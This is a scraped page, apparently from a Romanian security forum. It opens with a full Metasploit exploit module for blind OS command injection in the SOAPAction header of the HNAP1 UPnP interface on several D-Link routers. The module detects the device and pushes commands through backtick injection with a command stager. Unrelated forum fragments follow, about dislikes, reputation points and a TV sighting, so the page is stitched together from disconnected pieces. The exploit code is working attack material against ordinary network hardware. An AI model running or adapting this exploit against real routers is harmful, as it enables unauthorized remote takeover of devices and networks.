## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices UPnP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
-
Inainte sa dai dislike te-ai gandit ca AI NEVOIE DE CONT pe acel site ca sa poti descarca? Postezi doar ca sa te afli in treaba sau ce?
-
Slab
- 11 replies
-
- competition
- typing
-
(and 1 more)
Tagged with:
-
@Ganav e foarte simplu. - " tepar basit! " ( -50 ) - " can only hope to improve" ( -10 ) - " is an insignificant quantity at this point " 0 - [ -10 ] ) - " se balangane pe drum" ( 0 -50 ) - " will become famous soon enough" " ( 50 - 150 ) - " has a spectacular aurora about " ( 150-250 ) - " is a jewel in the rough " ( 250 -350 ) - " is just really nice " ( 350 - 450 ) - " is a glorious beacon of light" ( 450 -550 ) - " is a name known to all" ( 550 - 650 ) - " is a splendid one to behold" ( 650 - 900 ) - " has much to be proud of " ( 900 - 1300 sau 1400) ( nu mai stiu sigur ) - " has a reputation beyond repute " ( 1400 - 1800 ) - " has a brilliant future " ( 1800 - 2300 ) ( ceva de genul ) - " e cel mai tare din parcare ( 2300 )" Punctele acumulate le poti verifica Setting Daca esti interesat si cum se calculeaza Rep Power: - la fiecare 365 zile pe forum primesti 1 punct. - la fiecare 100 puncte primite primesti 1 punct. - la fiecare 1000 posturi primesti 1 punct. - ca sa se ia in calcul Rep Power si sa depaseasca valoarea 0, trebuie sa ai cel putin 50 posturi. Ex: Tu ai Rep Power 8 1 an pe forum = 1 punct 1000 posturi = 1 punct ai 600+ puncte rep ( sau ceva de genu ) 6 puncte total 8
-
asta-i din lista mea de prietenii Acum cateva seri la TV a aparut dereglatu asta.